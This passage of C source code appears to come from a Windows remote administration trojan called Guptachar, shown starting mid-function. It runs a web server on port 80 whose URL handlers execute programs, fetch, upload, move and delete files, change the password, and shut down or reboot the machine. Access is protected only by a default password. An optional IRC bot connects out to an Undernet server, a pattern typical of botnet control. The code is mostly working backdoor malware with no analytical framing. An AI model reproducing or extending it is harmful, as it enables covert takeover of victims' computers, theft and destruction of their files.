                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,disp,dispsz,0);
               }
               else if(strcmp(url,"/passwd") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,upasswd,passwdsz,0);
               }
               else if(strcmp(url,"/upload") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,upload,uploadsz,0);
               }
               else if(strncmp(url,"/transfer?",10) == 0)
               {
                              DoTransfer(s,url+10);
                              return -1;
               }
               else if(strncmp(url,"/setpasswd?",11) == 0)
               {
                              SetPassword(url+11);
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,spsd,spsdsz,0);
               }
               else if(strncmp(url,"/setattr?",9) == 0)
                              DoSetattr(s,url+9);
               else if(strncmp(url,"/exec?",6) == 0)
               {
                              DoExec(url+6);
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,exec2,exec2sz,0);
               }
               else if(strncmp(url,"/move?",6) == 0)
                              DoMove(s,url+6);
               else if(strncmp(url,"/copy?",6) == 0)
                              DoCopy(s,url+6);
               else if(strncmp(url,"/dispm?q=",9) == 0)
               {
                              DisplayMessage(url+9);
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,dispm,dispmsz,0);
               }
               else if(strncmp(url,"/fget?q=",8) == 0)
                              DoFget(s,url+8);
               else if(strncmp(url,"/prop?q=",8) == 0)
                              DoProp(s,url+8);
               else if(strncmp(url,"/delete?q=",10) == 0)
                              DoDelete(s,url+10);
               else if(strncmp(url,"/open?q=",8) == 0)
                              DoStart(s,url+8);
               else if(strncmp(url,"/mkdir?q=",9) == 0)
                              DoMkDir(s,url+9);
               else if(strcmp(url,"/Quit") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              strcat(outb,"<HTML><TITLE>Guptachar Remote Administration Tool</TITLE>\n");
                              strcat(outb,"The Guptachar server has been terminated.</HTML>");
                              send(s,outb,strlen(outb),0);
                              closesocket(s);
                              die();
               }
               else if(strcmp(url,"/pdown") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              strcat(outb,"<HTML><TITLE>Guptachar Remote Administration Tool</TITLE>\n");
                              strcat(outb,"System is going for power down.</HTML>");
                              send(s,outb,strlen(outb),0);
                              closesocket(s);
                              ExitWindowsEx(EWX_SHUTDOWN,0);
                              die();
               }
               else if(strcmp(url,"/reboot") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              strcat(outb,"<HTML><TITLE>Guptachar Remote Administration Tool</TITLE>\n");
                              strcat(outb,"System is going for reboot.</HTML>");
                              send(s,outb,strlen(outb),0);
                              closesocket(s);
                              ExitWindowsEx(EWX_REBOOT,0);
                              die();
               }
               else
               {
                              strcpy(outb,"HTTP/1.0 404 File Not Found\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              strcat(outb,"<HTML><TITLE>Server Error 404: File Not Found</TITLE>\n");
                              strcat(outb,"The Guptachar server does not recognise this URL.</HTML>");
                              send(s,outb,strlen(outb),0);
                        
               }
             
      }
      else
      {
                strcpy(outb,"HTTP/1.0 501 Method Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                strcat(outb,"<HTML><TITLE>Server Error 501: Method Not Implemented</TITLE>\n");
                strcat(outb,"The Guptachar Remote Administration Tool only supports the GET method.</HTML>");
                send(s,outb,strlen(outb),0);
      }

      closesocket(s);
      return 0;
}



/****** HTTP Server ******/



long WINAPI start_httpd(long krp)
{
        WSADATA ws;
        SOCKET  httpl,httpc;
        HANDLE  h;
        struct  sockaddr_in addr;
        long    t;

        WSAStartup(0x101,&ws);

        httpl = socket(AF_INET,SOCK_STREAM,0);
        addr.sin_family = AF_INET;
        addr.sin_port = htons(80);
        addr.sin_addr.s_addr = INADDR_ANY;
        bind(httpl,&addr,sizeof(addr));
        listen(httpl,10);

        while(1)
        {
                httpc = accept(httpl,NULL,NULL);
                CreateThread(NULL,0,(LPTHREAD_START_ROUTINE) handlereq,(LPVOID)httpc,0,(LPDWORD) &h);
                if(!h)
                        closesocket(httpc);
                else
                        CloseHandle(h);
        }
}


/******* IRC BOT *******/

int isonline()
{
	char name[257];
	struct hostent far * he;

	gethostname(name,256);
	he = gethostbyname(name);
	if(he->h_addr[0] == 127)
		return 0;
	else
		return 1;
}



long WINAPI ircbot(long t)
{
        char nick[256];
        char host[256];
        unsigned int port;

        GetProfileString("GSRV","inick","guser",nick,255);
        GetProfileString("GSRV","ihost","eu.undernet.org",host,255);
        port = GetProfileInt("GSRV","iport",6667);

        while(1)
        {
                if(isonline())
                        doirc(host,port,nick);
        }
}

/****** Entry/Exit Functions ******/


int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTR lpCmdLine, int nCmdShow)
{
        int i,isirc;
        MSG msg;
        HANDLE  h;

        GetProfileString("GSRV","pwdid","QW5vbnltb3VzOkFub255bW91cw==",passwd,1023);
        for(i = 0;passwd[i] != '\0';i++)
                if(i != 0)
                        if(passwd[i-1] == '=' && passwd[i] != '=')
                        {
                                passwd[i] = '\0';
                                break;
                        }

        CreateThread(NULL,0,(LPTHREAD_START_ROUTINE) start_httpd,NULL,0,(LPDWORD) &h);

        if(!h)
                return 0;
        else
               CloseHandle(h);

        isirc = GetProfileInt("GSRV","isirc",0);

        if(isirc)
        {
                CreateThread(NULL,0,(LPTHREAD_START_ROUTINE) ircbot,NULL,0,(LPDWORD) &h);

                if(h)
                       CloseHandle(h);
        }

        while(GetMessage(&msg,NULL,0,0))
        {
                TranslateMessage(&msg);
                DispatchMessage(&msg);
        }
        die();
}


void die()
{
        WSACleanup();
        ExitProcess(0);
}


